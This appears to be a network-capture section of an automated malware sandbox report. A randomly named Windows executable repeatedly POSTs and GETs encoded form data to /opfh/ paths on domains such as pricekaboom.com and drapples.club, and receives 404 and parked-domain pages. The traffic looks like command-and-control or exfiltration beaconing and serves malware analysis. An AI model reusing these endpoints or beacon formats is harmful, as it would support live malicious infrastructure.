May 27, 2024 12:22:42.241252899 CEST	1236	IN	Data Raw: 6c 61 73 73 3d 22 63 75 72 72 65 6e 74 2d 75 72 6c 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 74 72 6f 6e 67 3e 20 73 69 69 6e 20 73 65 72 76 65 72 69 73 20 65 69 20 6c 65 69 74 75 64 2e 3c 2f 70 3e 3c 62 75 74 74 6f 6e 20 6f 6e 63 6c 69 63 6b 3d 22 68 Data Ascii: lass="current-url"></span></strong> siin serveris ei leitud.</p><button onclick="history.back()" class="back-btn"><svg width="20" height="20" class="arrow-left" viewBox="0 0 20 20" xmlns="http://www.w3.org/2000/svg"><path d="M19 10.6126H3.3425
May 27, 2024 12:22:42.241262913 CEST	1236	IN	Data Raw: 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 34 30 34 3c 2f 68 31 3e 3c 68 33 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 53 69 76 75 61 20 65 69 20 6c c3 b6 79 64 79 3c 2f 68 33 3e 3c 70 20 63 6c 61 73 73 3d 22 64 65 73 63 22 3e 50 79 79 64 Data Ascii: ss="error-code">404</h1><h3 class="title">Sivua ei lydy</h3><p class="desc">Pyydetty URL-osoitetta <strong><span class="current-url"></span></strong> ei lytynyt tlt palvelimelta.</p><button onclick="history.back()" class="back-btn"><
May 27, 2024 12:22:42.241276026 CEST	1169	IN	Data Raw: 76 61 72 20 65 3d 7b 32 32 35 3a 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 2e 63 6f 6e 74 65 6e 74 2d 65 74 22 29 2c 74 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 Data Ascii: var e={225:()=>{const e=document.querySelectorAll(".content-et"),t=document.querySelectorAll(".content-ru"),r=document.querySelectorAll(".content-fi"),o=document.querySelectorAll(".content-en");let n=navigator.language.substring(0,2),c=locatio

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.7	63200	185.31.240.240	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:44.111512899 CEST	1753	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.pricekaboom.com Origin: http://www.pricekaboom.com Referer: http://www.pricekaboom.com/opfh/ Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 76 38 54 79 37 46 63 73 4d 37 2b 6f 69 45 53 51 32 41 63 64 45 72 4c 4b 2b 45 38 56 6c 6e 51 6f 73 43 37 59 57 41 76 61 4c 63 6c 52 48 6d 2f 4a 71 38 6f 2b 6b 68 6e 39 70 67 6f 7a 70 79 78 33 54 32 72 73 6f 41 4d 56 42 79 62 6b 33 4f 4e 48 61 38 7a 55 47 49 51 4c 57 65 4a 46 49 79 59 62 78 54 58 44 66 6f 4e 62 62 38 54 61 4c 34 70 36 34 70 36 4b 46 53 34 45 47 64 33 55 42 4a 4b 65 45 2f 74 4d 4d 36 6a 75 4c 50 43 49 75 76 37 65 39 47 65 48 56 57 4b 54 4e 67 71 4d 50 4b 7a 39 59 55 31 37 70 53 55 66 2b 42 45 52 4d 45 69 50 77 31 52 31 65 4e 6a 62 57 62 76 49 73 49 77 74 39 49 68 67 4b 2b 51 61 2b 4e 70 55 44 30 6d 5a 73 51 4e 57 44 41 59 6d 66 48 44 6e 79 6e 35 6e 43 75 6d 68 63 7a 33 74 68 42 71 34 6f 36 6e 2b 65 6e 70 66 6d 6c 69 75 77 41 69 59 69 62 55 47 4c 37 76 71 73 62 79 32 55 62 6d 6f 64 75 44 58 75 4d 70 54 41 6e 6e 42 72 33 77 47 39 74 30 4c 4e 56 57 66 50 41 36 4e 35 43 77 6f 2f 33 4f 53 61 32 53 30 35 2b 30 53 4c 70 69 6e 64 6f 62 4c 5a 32 65 35 46 62 6c 2f 41 6e 49 79 [TRUNCATED] Data Ascii: R40L6=v8Ty7FcsM7+oiESQ2AcdErLK+E8VlnQosC7YWAvaLclRHm/Jq8o+khn9pgozpyx3T2rsoAMVBybk3ONHa8zUGIQLWeJFIyYbxTXDfoNbb8TaL4p64p6KFS4EGd3UBJKeE/tMM6juLPCIuv7e9GeHVWKTNgqMPKz9YU17pSUf+BERMEiPw1R1eNjbWbvIsIwt9IhgK+Qa+NpUD0mZsQNWDAYmfHDnyn5nCumhcz3thBq4o6n+enpfmliuwAiYibUGL7vqsby2UbmoduDXuMpTAnnBr3wG9t0LNVWfPA6N5Cwo/3OSa2S05+0SLpindobLZ2e5Fbl/AnIy3L8jxuslIkHRkLAzFSoqZUVIqyXMXOH9AoChdm8pnOmUvJru0IStEPVqmkA1p7bC8Px3PWLpYf99GySivfXvhHRryGpOUWSbe/YQWMn6u89/BqFMVOxlSEUoy890/3RLqOZr3/wp/KMNBhkY472JKjNsJGdK0IGbasedbMQ7khkNkH72bcLg4Z42XfJIHQLEtzHbRdMeG6020O3zGLzWUg+CtIkOqhWuDSN1JtoTaLYVFf4g/EDIuFgHKY8ye53S4NqG/+9Gflcs/XGOrMsy2FLTC9ZDH9Y8c8a0kv+XigXmmmqZ7OJtTzgOItptylpTn54kZ7NwQVBIKurdFRk4qtbd3Uh6ZAYj3xF+zUVGW57Qi3c8kRkyfudrFi1ZSHLi9GCJN+svBZY+sWfp+/4Ii5ZtSKvrCly2PtGS7Ay4OjVu904wst4caJqX/6jWz55TCUjHGLt3wlyQj0jI+fcbykKHftqfOcp4RZJm88sSJZbuJClmtpKS+Iu222cu2isPvanFXGA2zTe95O2KDJFiUxZClS1M5YBTUrxPOomzoi9G5GYmVBPv/f+dyHDFukXZ/ej9aoFIDfYVxvh2gQVIv8CU1xrzh17RwVTk47AVT9MX3x3HPBQQ4FvfaIYigxgtgShBnNj1G9Aj0aAxda+ZYjZjWUfjknGkqQ [TRUNCATED]
May 27, 2024 12:22:44.754641056 CEST	1236	IN	HTTP/1.1 404 Not Found date: Mon, 27 May 2024 10:22:44 GMT server: Apache / ZoneOS last-modified: Mon, 06 Nov 2023 23:06:18 GMT etag: "1d7b-60983e6d29793" accept-ranges: bytes content-length: 7547 connection: close content-type: text/html Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 44 [TRUNCATED] Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="Content-Security-Policy" content="default-src 'unsafe-inline'"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="robots" content="noindex"><title>404 Page Not Found</title><style>:root { --illustration-main-color: #D82E23 !important; }</style><style>.current-url { word-wrap: break-word; }</style><style type="text/css">:root { --main-text-color: #4E4E4E; --secondary-text-color: #959595; --illustration-main-color: #C3C3CC; --btn-border-radius: 0.25rem; --primary-btn-background: #C3C3CC; --primary-btn-color: #FCFCFC; --secondary-btn-background: #FCFCFC; --secondary-btn-color: #C3C3CC; --main-icon-color: #C3C3CC;}* { box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; line-height: 1.5;}html { height: 100%;}html, body { margin: 0;}body {
May 27, 2024 12:22:44.754662991 CEST	1236	IN	Data Raw: 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 6d 69 6e 2d 68 65 69 67 Data Ascii: display: flex; flex-direction: column; padding-top: 100px; min-height: 100%; font-size: 16px; font-weight: 400; background-color: #FCFCFC;}.hidden { display: none;}.container, .hero { max-width: 78.125r
May 27, 2024 12:22:44.754678965 CEST	1236	IN	Data Raw: 72 65 6e 74 3b 0a 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 6d 61 69 6e 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 72 65 6d Data Ascii: rent; cursor: pointer; color: var(--main-text-color); margin-top: 5rem; display: flex;}.arrow-left { margin-right: 0.5rem; vertical-align: middle;}.arrow-left path { fill: var(--main-text-color);}.back-btn:
May 27, 2024 12:22:44.754692078 CEST	672	IN	Data Raw: 20 76 61 72 28 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3b 0a 7d 0a 0a 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 20 7b 0a 20 20 20 20 2e 63 6f 6e 74 61 Data Ascii: var(--secondary-text-color);}@media screen and (min-width: 768px) { .container { width: 85%; } .hero { flex-direction: row; } #illustration { display: block; } .text-wrapper {
May 27, 2024 12:22:44.754704952 CEST	1236	IN	Data Raw: 22 4d 31 39 20 31 30 2e 36 31 32 36 48 33 2e 33 34 32 35 36 4c 31 30 2e 38 36 34 37 20 31 38 2e 31 33 34 37 4c 39 2e 39 39 39 33 39 20 31 39 4c 31 20 31 30 2e 30 30 30 36 4c 31 30 2e 30 30 30 36 20 31 4c 31 30 2e 38 36 35 39 20 31 2e 38 36 35 33 Data Ascii: "M19 10.6126H3.34256L10.8647 18.1347L9.99939 19L1 10.0006L10.0006 1L10.8659 1.8653L3.34256 9.38866H19V10.6126Z" fill="black"/></svg> Tagasi</button><p class="auto-placed">Kesolev leht on siia automaatselt paigutatud Zone poolt.</p></div><div
May 27, 2024 12:22:44.754715919 CEST	1236	IN	Data Raw: 20 63 6c 61 73 73 3d 22 62 61 63 6b 2d 62 74 6e 22 3e 3c 73 76 67 20 77 69 64 74 68 3d 22 32 30 22 20 68 65 69 67 68 74 3d 22 32 30 22 20 63 6c 61 73 73 3d 22 61 72 72 6f 77 2d 6c 65 66 74 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 32 Data Ascii: class="back-btn"><svg width="20" height="20" class="arrow-left" viewBox="0 0 20 20" xmlns="http://www.w3.org/2000/svg"><path d="M19 10.6126H3.34256L10.8647 18.1347L9.99939 19L1 10.0006L10.0006 1L10.8659 1.8653L3.34256 9.38866H19V10.6126Z" fil
May 27, 2024 12:22:44.754740953 CEST	945	IN	Data Raw: 72 69 6e 67 28 30 2c 32 29 2c 63 3d 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2c 6c 3d 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 73 70 6c 69 74 28 22 2f 22 29 2e 73 6c 69 63 65 28 2d 31 29 3b 6c 3d 6c 5b 30 5d 2e 73 70 6c 69 74 28 22 2e Data Ascii: ring(0,2),c=location.hostname,l=location.href.split("/").slice(-1);l=l[0].split(".").slice(1,-1).join("."),"et"===n?e.forEach((e=>{e.classList.remove("hidden")})):"ru"===n?t.forEach((e=>{e.classList.remove("hidden")})):"fi"===n?r.forEach((e=>{

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.7	63201	185.31.240.240	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:46.698255062 CEST	459	OUT	GET /opfh/?R40L6=i+7S41wOBsHRtkSR5z49LNLl1g14jCJSsH67VhPHZINUfWrbgsYvxB6MwE8qgxdKQETWoz01bCGz4LwvUs/3BJoUBrhuAwUbkATTebp7Ts+JQM1y8oWpV0wDLMDnSIORGtRyV6PjEdP1&b2PX=hZXl7VFPKl04 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.pricekaboom.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
May 27, 2024 12:22:47.358438015 CEST	1236	IN	HTTP/1.1 404 Not Found date: Mon, 27 May 2024 10:22:47 GMT server: Apache / ZoneOS last-modified: Mon, 06 Nov 2023 23:06:18 GMT etag: "1d7b-60983e6d29793" accept-ranges: bytes content-length: 7547 connection: close content-type: text/html Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 44 [TRUNCATED] Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="Content-Security-Policy" content="default-src 'unsafe-inline'"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="robots" content="noindex"><title>404 Page Not Found</title><style>:root { --illustration-main-color: #D82E23 !important; }</style><style>.current-url { word-wrap: break-word; }</style><style type="text/css">:root { --main-text-color: #4E4E4E; --secondary-text-color: #959595; --illustration-main-color: #C3C3CC; --btn-border-radius: 0.25rem; --primary-btn-background: #C3C3CC; --primary-btn-color: #FCFCFC; --secondary-btn-background: #FCFCFC; --secondary-btn-color: #C3C3CC; --main-icon-color: #C3C3CC;}* { box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; line-height: 1.5;}html { height: 100%;}html, body { margin: 0;}body {
May 27, 2024 12:22:47.358457088 CEST	224	IN	Data Raw: 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 6d 69 6e 2d 68 65 69 67 Data Ascii: display: flex; flex-direction: column; padding-top: 100px; min-height: 100%; font-size: 16px; font-weight: 400; background-color: #FCFCFC;}.hidden { display: none;}.container, .hero {
May 27, 2024 12:22:47.358541012 CEST	1236	IN	Data Raw: 20 6d 61 78 2d 77 69 64 74 68 3a 20 37 38 2e 31 32 35 72 65 6d 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 39 30 25 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 61 6c 69 Data Ascii: max-width: 78.125rem;}.container { width: 90%; margin: 0 auto; align-self: center;}.hero { display: flex; justify-content: space-between; align-self: center; min-height: 37.5rem; width: 100%; flex-di
May 27, 2024 12:22:47.358587027 CEST	1236	IN	Data Raw: 6c 6f 72 29 3b 0a 7d 0a 0a 2e 62 61 63 6b 2d 62 74 6e 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3b 0a 7d 0a 0a 2e 62 61 63 6b 2d 62 74 6e 3a 68 6f Data Ascii: lor);}.back-btn:hover { color: var(--secondary-text-color);}.back-btn:hover .arrow-left path { fill: var(--secondary-text-color);}.button { padding: 0; margin: 0 1rem 0 0; border: none; border-radius: var(--btn
May 27, 2024 12:22:47.358602047 CEST	1236	IN	Data Raw: 2d 77 72 61 70 70 65 72 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 20 20 20 20 7d 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 Data Ascii: -wrapper { width: 50%; }}</style></head><body><section class="container"><div class="content-et hidden"><h1 class="error-code">404</h1><h3 class="title">Lehte ei leitud</h3><p class="desc">Lehte <strong><span class="current-url">
May 27, 2024 12:22:47.358644962 CEST	1236	IN	Data Raw: 56 31 30 2e 36 31 32 36 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 2f 3e 3c 2f 73 76 67 3e 20 54 61 67 61 73 69 3c 2f 62 75 74 74 6f 6e 3e 3c 70 20 63 6c 61 73 73 3d 22 61 75 74 6f 2d 70 6c 61 63 65 64 22 3e d0 ad d1 82 d0 b0 20 d1 81 d1 82 d1 Data Ascii: V10.6126Z" fill="black"/></svg> Tagasi</button><p class="auto-placed"> Zone .</p></div><div class="content-fi hidden"><h1 class="error-code">404
May 27, 2024 12:22:47.358683109 CEST	1236	IN	Data Raw: 39 20 31 39 4c 31 20 31 30 2e 30 30 30 36 4c 31 30 2e 30 30 30 36 20 31 4c 31 30 2e 38 36 35 39 20 31 2e 38 36 35 33 4c 33 2e 33 34 32 35 36 20 39 2e 33 38 38 36 36 48 31 39 56 31 30 2e 36 31 32 36 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 2f Data Ascii: 9 19L1 10.0006L10.0006 1L10.8659 1.8653L3.34256 9.38866H19V10.6126Z" fill="black"/></svg> Go Back</button><p class="auto-placed">This page is placed here automatically by Zone.</p></div></section><script defer="defer">(()=>{var e={225:()=>{con
May 27, 2024 12:22:47.358691931 CEST	157	IN	Data Raw: 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6f 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 74 5b 6f 5d 7d 29 7d 2c 72 2e 6f 3d 28 65 2c 74 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 Data Ascii: .defineProperty(e,o,{enumerable:!0,get:t[o]})},r.o=(e,t)=>Object.prototype.hasOwnProperty.call(e,t),(()=>{"use strict";r(225)})()})();</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.7	63202	199.59.243.225	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:52.490180969 CEST	714	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.drapples.club Origin: http://www.drapples.club Referer: http://www.drapples.club/opfh/ Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 46 76 4b 32 4e 41 54 77 53 69 46 4e 55 39 70 73 62 45 53 4b 41 57 36 6a 43 65 54 6e 51 31 37 64 35 31 50 61 5a 39 37 48 65 73 52 67 4d 72 6f 65 2f 62 70 6c 69 39 62 38 79 51 36 30 46 56 39 56 63 54 4e 53 6e 39 30 62 55 48 59 62 6c 68 43 66 41 51 6d 6c 36 50 33 44 33 37 75 52 49 69 72 71 6b 48 66 6c 52 38 4e 6e 46 50 2b 76 35 6e 42 69 66 6e 2b 63 6a 6c 64 58 41 6d 74 69 56 7a 36 59 78 54 47 52 71 42 4d 49 76 4b 46 57 69 4a 2f 54 6e 2f 75 7a 35 64 73 78 65 6e 66 38 35 39 31 58 57 74 73 4c 6b 51 34 48 50 43 38 54 6c 79 49 38 42 57 72 79 55 61 65 63 53 51 78 61 39 66 4a 56 4b 39 64 32 4d 47 6e 39 30 6c 76 73 4e 45 77 56 49 41 3d 3d Data Ascii: R40L6=FvK2NATwSiFNU9psbESKAW6jCeTnQ17d51PaZ97HesRgMroe/bpli9b8yQ60FV9VcTNSn90bUHYblhCfAQml6P3D37uRIirqkHflR8NnFP+v5nBifn+cjldXAmtiVz6YxTGRqBMIvKFWiJ/Tn/uz5dsxenf8591XWtsLkQ4HPC8TlyI8BWryUaecSQxa9fJVK9d2MGn90lvsNEwVIA==
May 27, 2024 12:22:52.945401907 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 27 May 2024 10:22:52 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: 87b641e3-cfbc-4fe6-8cf8-8139caefe5e3 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_h81eJFbn4TlnvX499eJj8fuzpnXsJ6dgkOVB+OPiMDN1v5mGD8xX/ZWCT+qDOPZ635PD18fBwmoOxl+gTjtqpQ== set-cookie: parking_session=87b641e3-cfbc-4fe6-8cf8-8139caefe5e3; expires=Mon, 27 May 2024 10:37:52 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 68 38 31 65 4a 46 62 6e 34 54 6c 6e 76 58 34 39 39 65 4a 6a 38 66 75 7a 70 6e 58 73 4a 36 64 67 6b 4f 56 42 2b 4f 50 69 4d 44 4e 31 76 35 6d 47 44 38 78 58 2f 5a 57 43 54 2b 71 44 4f 50 5a 36 33 35 50 44 31 38 66 42 77 6d 6f 4f 78 6c 2b 67 54 6a 74 71 70 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_h81eJFbn4TlnvX499eJj8fuzpnXsJ6dgkOVB+OPiMDN1v5mGD8xX/ZWCT+qDOPZ635PD18fBwmoOxl+gTjtqpQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
May 27, 2024 12:22:52.945430040 CEST	571	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiODdiNjQxZTMtY2ZiYy00ZmU2LThjZjgtODEzOWNhZWZlNWUzIiwicGFnZV90aW1lIjoxNzE2ODA1Mz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.7	63203	199.59.243.225	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:55.019215107 CEST	734	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.drapples.club Origin: http://www.drapples.club Referer: http://www.drapples.club/opfh/ Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 46 76 4b 32 4e 41 54 77 53 69 46 4e 56 64 35 73 57 48 36 4b 56 47 36 38 65 4f 54 6e 61 56 37 42 35 31 44 61 5a 38 2f 58 64 66 35 67 4e 4a 77 65 74 4b 70 6c 6a 39 62 38 6d 67 36 78 61 46 39 53 63 54 49 74 6e 35 77 62 55 44 49 62 6c 67 79 66 48 6a 65 69 37 66 33 42 38 62 75 54 46 43 72 71 6b 48 66 6c 52 38 4a 42 46 50 6d 76 35 55 70 69 65 43 4b 66 39 56 64 49 4b 47 74 69 66 54 36 63 78 54 47 4a 71 45 55 75 76 49 4e 57 69 49 50 54 6e 74 57 30 33 64 73 37 54 48 65 4d 2b 59 55 68 63 76 45 59 6d 44 67 35 4a 44 41 4d 74 6b 56 65 62 30 6e 65 4b 4c 6d 6e 57 53 56 73 71 35 55 67 49 38 5a 75 42 6b 54 63 72 53 4b 47 41 57 52 52 65 2f 2f 76 62 64 4a 4d 31 30 48 32 4f 55 56 4a 74 35 44 57 6a 47 45 